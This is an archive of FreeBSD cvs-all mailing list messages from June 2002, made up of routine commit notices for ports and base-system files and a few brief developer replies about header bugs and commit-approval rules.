files: net/ipcheck Makefile distinfo Log: Update to 0.169 Revision Changes Path 1.14 +13 -3 ports/net/ipcheck/Makefile 1.11 +1 -1 ports/net/ipcheck/distinfo To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 9:13:23 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 803E837B406; Fri, 21 Jun 2002 09:13:18 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LGDII05737; Fri, 21 Jun 2002 09:13:18 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206211613.g5LGDII05737@freefall.freebsd.org> From: Ying-Chieh Liao Date: Fri, 21 Jun 2002 09:13:18 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/ftp/downloader Makefile ports/ftp/ftpq Makefile ports/ftp/junglemonkey Makefile ports/ftp/libfxp Makefile ports/ftp/mget Makefile ports/ftp/muddleftpd Makefile ports/ftp/pavuk Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/21 09:13:18 PDT Modified files: ftp/downloader Makefile ftp/ftpq Makefile ftp/junglemonkey Makefile ftp/libfxp Makefile ftp/mget Makefile ftp/muddleftpd Makefile ftp/pavuk Makefile Log: Replace ${PERL} with ${REINPLACE_CMD} PR: 39594 Submitted by: Oliver Braun Revision Changes Path 1.34 +4 -3 ports/ftp/downloader/Makefile 1.11 +3 -2 ports/ftp/ftpq/Makefile 1.16 +5 -4 ports/ftp/junglemonkey/Makefile 1.2 +3 -2 ports/ftp/libfxp/Makefile 1.3 +3 -1 ports/ftp/mget/Makefile 1.4 +5 -4 ports/ftp/muddleftpd/Makefile 1.25 +4 -3 ports/ftp/pavuk/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 9:17:26 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 3BE0C37B40C; Fri, 21 Jun 2002 09:17:18 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LGHIM06354; Fri, 21 Jun 2002 09:17:18 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206211617.g5LGHIM06354@freefall.freebsd.org> From: Ying-Chieh Liao Date: Fri, 21 Jun 2002 09:17:18 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/www/asp2php Makefile ports/net/gopher Makefile ports/archivers/nomarch Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/21 09:17:18 PDT Modified files: www/asp2php Makefile net/gopher Makefile archivers/nomarch Makefile Log: ${PERL} -> ${REINPLACE_CMD} PR: 39587, 39589, 39590 Submitted by: maintainer Revision Changes Path 1.3 +3 -1 ports/archivers/nomarch/Makefile 1.22 +3 -1 ports/net/gopher/Makefile 1.14 +2 -1 ports/www/asp2php/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 9:20:33 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 0E84737B400; Fri, 21 Jun 2002 09:20:24 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LGKO907242; Fri, 21 Jun 2002 09:20:24 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206211620.g5LGKO907242@freefall.freebsd.org> From: Ying-Chieh Liao Date: Fri, 21 Jun 2002 09:20:23 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/lang/Gofer Makefile ports/lang/Sather Makefile ports/lang/ferite Makefile ports/lang/schemetoc Makefile ports/lang/scm Makefile ports/lang/smalltalk Makefile ports/lang/sxm Makefile ports/lang/wxbasic Makefile ... X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/21 09:20:23 PDT Modified files: lang/Gofer Makefile lang/Sather Makefile lang/ferite Makefile lang/schemetoc Makefile lang/scm Makefile lang/smalltalk Makefile lang/sxm Makefile lang/wxbasic Makefile lang/yabasic Makefile Log: Replace ${PERL} with ${REINPLACE_CMD} PR: 39605 Submitted by: Oliver Braun Revision Changes Path 1.15 +4 -2 ports/lang/Gofer/Makefile 1.24 +2 -1 ports/lang/Sather/Makefile 1.6 +2 -1 ports/lang/ferite/Makefile 1.22 +3 -2 ports/lang/schemetoc/Makefile 1.27 +3 -2 ports/lang/scm/Makefile 1.40 +4 -3 ports/lang/smalltalk/Makefile 1.3 +2 -1 ports/lang/sxm/Makefile 1.3 +2 -1 ports/lang/wxbasic/Makefile 1.15 +3 -2 ports/lang/yabasic/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 9:25:35 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id E4BAD37B407; Fri, 21 Jun 2002 09:25:27 -0700 (PDT) Received: (from mjacob@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LGPRs08278; Fri, 21 Jun 2002 09:25:27 -0700 (PDT) (envelope-from mjacob) Message-Id: <200206211625.g5LGPRs08278@freefall.freebsd.org> From: Matt Jacob Date: Fri, 21 Jun 2002 09:25:27 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/alpha/conf GENERIC X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG mjacob 2002/06/21 09:25:27 PDT Modified files: (Branch: RELENG_4) sys/alpha/conf GENERIC Log: MFC: note that sio is required PR: 39305 Revision Changes Path 1.71.2.20 +1 -1 src/sys/alpha/conf/GENERIC To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 9:26:27 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id D3CE437B408; Fri, 21 Jun 2002 09:26:23 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LGQNd08364; Fri, 21 Jun 2002 09:26:23 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206211626.g5LGQNd08364@freefall.freebsd.org> From: Ying-Chieh Liao Date: Fri, 21 Jun 2002 09:26:23 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/www/p5-Template-Toolkit Makefile distinfo pkg-plist X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/21 09:26:23 PDT Modified files: www/p5-Template-Toolkit Makefile distinfo pkg-plist Log: upgrade to 2.07 PR: 39613 Submitted by: David Lay Revision Changes Path 1.7 +8 -7 ports/www/p5-Template-Toolkit/Makefile 1.5 +1 -1 ports/www/p5-Template-Toolkit/distinfo 1.5 +9 -0 ports/www/p5-Template-Toolkit/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 9:31: 2 2002 Delivered-To: cvs-all@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id B661537B40D; Fri, 21 Jun 2002 09:30:51 -0700 (PDT) Received: from khavrinen.lcs.mit.edu (localhost [IPv6:::1]) by khavrinen.lcs.mit.edu (8.12.3/8.12.3) with ESMTP id g5LGUoDK079668; Fri, 21 Jun 2002 12:30:50 -0400 (EDT) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.12.3/8.12.3/Submit) id g5LGUo3x079665; Fri, 21 Jun 2002 12:30:50 -0400 (EDT) (envelope-from wollman) Date: Fri, 21 Jun 2002 12:30:50 -0400 (EDT) From: Garrett Wollman Message-Id: <200206211630.g5LGUo3x079665@khavrinen.lcs.mit.edu> To: Poul-Henning Kamp Cc: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.bin/xlint/llib llib-lposix In-Reply-To: <200206210923.g5L9NCD28729@freefall.freebsd.org> References: <200206210923.g5L9NCD28729@freefall.freebsd.org> Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG < said: > #include before to get timespec. This is actually a bug in . -GAWollman To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 9:39:53 2002 Delivered-To: cvs-all@freebsd.org Received: from mailman.zeta.org.au (mailman.zeta.org.au [203.26.10.16]) by hub.freebsd.org (Postfix) with ESMTP id E3A3637B404; Fri, 21 Jun 2002 09:39:46 -0700 (PDT) Received: from bde.zeta.org.au (bde.zeta.org.au [203.2.228.102]) by mailman.zeta.org.au (8.9.3/8.8.7) with ESMTP id CAA04955; Sat, 22 Jun 2002 02:39:45 +1000 Date: Sat, 22 Jun 2002 02:44:41 +1000 (EST) From: Bruce Evans X-X-Sender: bde@gamplex.bde.org To: Juli Mallett Cc: cvs-committers@FreeBSD.org, Subject: Re: cvs commit: src/usr.sbin/inetd inetd.c In-Reply-To: <200206211125.g5LBPBH53132@freefall.freebsd.org> Message-ID: <20020622024301.H4626-100000@gamplex.bde.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Fri, 21 Jun 2002, Juli Mallett wrote: > jmallett 2002/06/21 04:25:11 PDT > > Modified files: > usr.sbin/inetd inetd.c > Log: > Use __typeof__ instead of typeof. Both of these are gcc features. I prefer typeof since it doesn't give undefined behaviour for non-gcc compilers. Bruce To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 9:43:21 2002 Delivered-To: cvs-all@freebsd.org Received: from mailman.zeta.org.au (mailman.zeta.org.au [203.26.10.16]) by hub.freebsd.org (Postfix) with ESMTP id ACAA137B40E; Fri, 21 Jun 2002 09:42:28 -0700 (PDT) Received: from bde.zeta.org.au (bde.zeta.org.au [203.2.228.102]) by mailman.zeta.org.au (8.9.3/8.8.7) with ESMTP id CAA05080; Sat, 22 Jun 2002 02:42:26 +1000 Date: Sat, 22 Jun 2002 02:47:23 +1000 (EST) From: Bruce Evans X-X-Sender: bde@gamplex.bde.org To: Poul-Henning Kamp Cc: cvs-committers@FreeBSD.org, Subject: Re: cvs commit: src/usr.bin/xlint/llib llib-lposix In-Reply-To: <200206210923.g5L9NCD28729@freefall.freebsd.org> Message-ID: <20020622024532.C4626-100000@gamplex.bde.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Fri, 21 Jun 2002, Poul-Henning Kamp wrote: > phk 2002/06/21 02:23:12 PDT > > Modified files: > usr.bin/xlint/llib llib-lposix > Log: > #include before to get timespec. The bug is namespace pollution in . Please back this out after fixing . Bruce To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 9:43:59 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 09B3437B406; Fri, 21 Jun 2002 09:42:35 -0700 (PDT) Received: (from des@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LGgZw10795; Fri, 21 Jun 2002 09:42:35 -0700 (PDT) (envelope-from des) Message-Id: <200206211642.g5LGgZw10795@freefall.freebsd.org> From: Dag-Erling Smorgrav Date: Fri, 21 Jun 2002 09:42:35 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: doc/en_US.ISO8859-1/articles/pam article.sgml X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG des 2002/06/21 09:42:35 PDT Modified files: en_US.ISO8859-1/articles/pam article.sgml Log: Try to explain how the dispatcher works, with all (well, both) its quirks. Translators: still not done, please hold off. Sponsored by: DARPA, NAI Labs Revision Changes Path 1.18 +87 -1 doc/en_US.ISO8859-1/articles/pam/article.sgml To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 9:44:36 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 8376E37B405; Fri, 21 Jun 2002 09:42:43 -0700 (PDT) Received: (from charnier@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LGghe10822; Fri, 21 Jun 2002 09:42:43 -0700 (PDT) (envelope-from charnier) Message-Id: <200206211642.g5LGghe10822@freefall.freebsd.org> From: Philippe Charnier Date: Fri, 21 Jun 2002 09:42:43 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.sbin/cdcontrol cdcontrol.1 src/usr.sbin/cron/crontab crontab.1 src/usr.sbin/crunch/crunchgen crunchgen.1 src/usr.sbin/crunch/crunchide crunchide.1 src/usr.sbin/ctm/ctm ctm.1 src/usr.sbin/ctm/ctm_rmail ctm_rmail.1 ... X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG charnier 2002/06/21 09:42:43 PDT Modified files: (Branch: RELENG_4) usr.sbin/cdcontrol cdcontrol.1 usr.sbin/cron/crontab crontab.1 usr.sbin/crunch/crunchgen crunchgen.1 usr.sbin/crunch/crunchide crunchide.1 usr.sbin/ctm/ctm ctm.1 usr.sbin/ctm/ctm_rmail ctm_rmail.1 usr.sbin/fdcontrol fdcontrol.8 usr.sbin/fdformat fdformat.1 usr.sbin/fdwrite fdwrite.1 usr.sbin/i4b/dtmfdecode dtmfdecode.1 usr.sbin/i4b/g711conv g711conv.1 usr.sbin/kbdmap kbdmap.1 usr.sbin/lpr/lp lp.1 usr.sbin/lpr/lpq lpq.1 usr.sbin/lpr/lpr lpr.1 usr.sbin/lpr/lprm lprm.1 usr.sbin/lpr/lptest lptest.1 usr.sbin/pcvt/fontedit fontedit.1 usr.sbin/pcvt/kcon kcon.1 usr.sbin/pcvt/userkeys vt220keys.1 usr.sbin/pcvt/vttest vttest.1 usr.sbin/pkg_install/add pkg_add.1 usr.sbin/pkg_install/delete pkg_delete.1 usr.sbin/pkg_install/sign pkg_sign.1 usr.sbin/pkg_install/version pkg_version.1 usr.sbin/rtprio rtprio.1 usr.sbin/tcpdump/tcpslice tcpslice.1 usr.sbin/vidcontrol vidcontrol.1 usr.sbin/xten xten.1 Log: The .Nm utility Revision Changes Path 1.21.2.12 +3 -2 src/usr.sbin/cdcontrol/cdcontrol.1 1.7.2.4 +3 -2 src/usr.sbin/cron/crontab/crontab.1 1.11.2.10 +12 -6 src/usr.sbin/crunch/crunchgen/crunchgen.1 1.5.2.4 +10 -7 src/usr.sbin/crunch/crunchide/crunchide.1 1.17.2.8 +10 -6 src/usr.sbin/ctm/ctm/ctm.1 1.19.2.6 +13 -8 src/usr.sbin/ctm/ctm_rmail/ctm_rmail.1 1.9.2.4 +11 -8 src/usr.sbin/fdcontrol/fdcontrol.8 1.17.2.6 +7 -5 src/usr.sbin/fdformat/fdformat.1 1.12.2.6 +16 -10 src/usr.sbin/fdwrite/fdwrite.1 1.5.2.5 +2 -0 src/usr.sbin/i4b/dtmfdecode/dtmfdecode.1 1.4.2.6 +2 -0 src/usr.sbin/i4b/g711conv/g711conv.1 1.17.2.9 +5 -3 src/usr.sbin/kbdmap/kbdmap.1 1.12.2.4 +4 -3 src/usr.sbin/lpr/lp/lp.1 1.5.2.4 +10 -7 src/usr.sbin/lpr/lpq/lpq.1 1.11.2.6 +7 -5 src/usr.sbin/lpr/lpr/lpr.1 1.5.2.5 +10 -7 src/usr.sbin/lpr/lprm/lprm.1 1.3.2.3 +7 -5 src/usr.sbin/lpr/lptest/lptest.1 1.4.2.2 +10 -5 src/usr.sbin/pcvt/fontedit/fontedit.1 1.7.2.6 +4 -1 src/usr.sbin/pcvt/kcon/kcon.1 1.7.2.2 +10 -7 src/usr.sbin/pcvt/userkeys/vt220keys.1 1.4.2.2 +4 -3 src/usr.sbin/pcvt/vttest/vttest.1 1.35.2.11 +2 -1 src/usr.sbin/pkg_install/add/pkg_add.1 1.16.2.9 +3 -1 src/usr.sbin/pkg_install/delete/pkg_delete.1 1.1.2.5 +10 -5 src/usr.sbin/pkg_install/sign/pkg_sign.1 1.5.2.14 +3 -2 src/usr.sbin/pkg_install/version/pkg_version.1 1.19.2.4 +8 -5 src/usr.sbin/rtprio/rtprio.1 1.7.2.7 +13 -9 src/usr.sbin/tcpdump/tcpslice/tcpslice.1 1.24.2.13 +4 -2 src/usr.sbin/vidcontrol/vidcontrol.1 1.9.2.3 +4 -3 src/usr.sbin/xten/xten.1 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 9:45: 5 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 3D6E137B40F; Fri, 21 Jun 2002 09:42:46 -0700 (PDT) Received: (from sobomax@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LGgk410879; Fri, 21 Jun 2002 09:42:46 -0700 (PDT) (envelope-from sobomax) Message-Id: <200206211642.g5LGgk410879@freefall.freebsd.org> From: Maxim Sobolev Date: Fri, 21 Jun 2002 09:42:46 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/print/freetype2 Makefile distinfo pkg-plist ports/print/freetype2/files patch-aa patch-builds::unix::configure patch-include::freetype::config::ftoption.h patch-src::pcf::pcfdriver.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG sobomax 2002/06/21 09:42:46 PDT Modified files: print/freetype2 Makefile distinfo pkg-plist print/freetype2/files patch-aa patch-builds::unix::configure patch-include::freetype::config::ftoption.h Removed files: print/freetype2/files patch-src::pcf::pcfdriver.c Log: Update to 2.1.1. Revision Changes Path 1.39 +1 -2 ports/print/freetype2/Makefile 1.19 +1 -1 ports/print/freetype2/distinfo 1.3 +16 -9 ports/print/freetype2/files/patch-aa 1.2 +3 -12 ports/print/freetype2/files/patch-builds::unix::configure 1.4 +7 -4 ports/print/freetype2/files/patch-include::freetype::config::ftoption.h 1.2 +0 -25 ports/print/freetype2/files/patch-src::pcf::pcfdriver.c (dead) 1.23 +10 -2 ports/print/freetype2/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 9:52:31 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id A668D37B408; Fri, 21 Jun 2002 09:52:27 -0700 (PDT) Received: (from glewis@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LGqRP12115; Fri, 21 Jun 2002 09:52:27 -0700 (PDT) (envelope-from glewis) Message-Id: <200206211652.g5LGqRP12115@freefall.freebsd.org> From: Greg Lewis Date: Fri, 21 Jun 2002 09:52:27 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/misc/cave Makefile distinfo X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG glewis 2002/06/21 09:52:27 PDT Modified files: misc/cave Makefile distinfo Log: Update to 1.0 (this also unbreaks the port as 0.7 appears to have been removed from distribution). Revision Changes Path 1.6 +1 -1 ports/misc/cave/Makefile 1.5 +1 -1 ports/misc/cave/distinfo To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 9:55:30 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 8869037B400; Fri, 21 Jun 2002 09:55:26 -0700 (PDT) Received: (from dinoex@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LGtQx12352; Fri, 21 Jun 2002 09:55:26 -0700 (PDT) (envelope-from dinoex) Message-Id: <200206211655.g5LGtQx12352@freefall.freebsd.org> From: Dirk Meyer Date: Fri, 21 Jun 2002 09:55:26 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/net/crescendo Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG dinoex 2002/06/21 09:55:26 PDT Modified files: net/crescendo Makefile Log: Drop PERL for SED Revision Changes Path 1.12 +7 -3 ports/net/crescendo/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 9:58:42 2002 Delivered-To: cvs-all@freebsd.org Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.86.163]) by hub.freebsd.org (Postfix) with ESMTP id 4CFC037B40E; Fri, 21 Jun 2002 09:58:23 -0700 (PDT) Received: from critter.freebsd.dk (localhost [127.0.0.1]) by critter.freebsd.dk (8.12.3/8.12.2) with ESMTP id g5LGuVCn035840; Fri, 21 Jun 2002 18:56:31 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) To: obrien@FreeBSD.org Cc: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: CVSROOT avail In-Reply-To: Your message of "Fri, 21 Jun 2002 09:02:36 PDT." <20020621090236.C24032@dragon.nuxi.com> Date: Fri, 21 Jun 2002 18:56:31 +0200 Message-ID: <35839.1024678591@critter.freebsd.dk> From: Poul-Henning Kamp Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG In message <20020621090236.C24032@dragon.nuxi.com>, "David O'Brien" writes: >On Fri, Jun 21, 2002 at 10:01:10AM +0200, Poul-Henning Kamp wrote: >> I see no "Approved by: core" in this email ? > >You said you didn't want all these rules with core having to approve >them. Yes, because I expected committers to be intelligent enough to do without detailed rules. You seem to be the exception since you keep asking for detailed rules. -- Poul-Henning Kamp | UNIX since Zilog Zeus 3.20 phk@FreeBSD.ORG | TCP/IP since RFC 956 FreeBSD committer | BSD since 4.3-tahoe Never attribute to malice what can adequately be explained by incompetence. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 10: 5:41 2002 Delivered-To: cvs-all@freebsd.org Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.86.163]) by hub.freebsd.org (Postfix) with ESMTP id 291A637B400; Fri, 21 Jun 2002 10:05:27 -0700 (PDT) Received: from critter.freebsd.dk (localhost [127.0.0.1]) by critter.freebsd.dk (8.12.3/8.12.2) with ESMTP id g5LH3WCn037188; Fri, 21 Jun 2002 19:03:36 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) To: Garrett Wollman Cc: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: src/usr.bin/xlint/llib llib-lposix In-Reply-To: Your message of "Fri, 21 Jun 2002 12:30:50 EDT." <200206211630.g5LGUo3x079665@khavrinen.lcs.mit.edu> Date: Fri, 21 Jun 2002 19:03:32 +0200 Message-ID: <37187.1024679012@critter.freebsd.dk> From: Poul-Henning Kamp Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG In message <200206211630.g5LGUo3x079665@khavrinen.lcs.mit.edu>, Garrett Wollman writes: >< said: > >> #include before to get timespec. > >This is actually a bug in . Could be. I just wanted world to build again. -- Poul-Henning Kamp | UNIX since Zilog Zeus 3.20 phk@FreeBSD.ORG | TCP/IP since RFC 956 FreeBSD committer | BSD since 4.3-tahoe Never attribute to malice what can adequately be explained by incompetence. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 10:11:12 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 806FF37B419; Fri, 21 Jun 2002 10:10:57 -0700 (PDT) Received: (from marcus@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LHAvT20386; Fri, 21 Jun 2002 10:10:57 -0700 (PDT) (envelope-from marcus) Message-Id: <200206211710.g5LHAvT20386@freefall.freebsd.org> From: Joe Marcus Clarke Date: Fri, 21 Jun 2002 10:10:57 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/misc/metatheme2 Makefile ports/www/nautilus-gtkhtml Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG marcus 2002/06/21 10:10:57 PDT Modified files: misc/metatheme2 Makefile www/nautilus-gtkhtml Makefile Log: It seems that these distfiles have been removed from the latest GNOME 2.0 snapshot directory. Specify a dist subdirectory that does contain the correct distfiles. Submitted by: fenner's check Revision Changes Path 1.17 +1 -1 ports/misc/metatheme2/Makefile 1.3 +1 -1 ports/www/nautilus-gtkhtml/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 10:25:53 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id CB3D637B407; Fri, 21 Jun 2002 10:25:45 -0700 (PDT) Received: (from ade@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LHPjn21993; Fri, 21 Jun 2002 10:25:45 -0700 (PDT) (envelope-from ade) Message-Id: <200206211725.g5LHPjn21993@freefall.freebsd.org> From: Ade Lovett Date: Fri, 21 Jun 2002 10:25:45 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/graphics/fnlib Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ade 2002/06/21 10:25:45 PDT Modified files: graphics/fnlib Makefile Log: Fix fennerism. Relinquish maintainership, I no longer use this port. Revision Changes Path 1.22 +4 -6 ports/graphics/fnlib/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 10:34: 7 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with 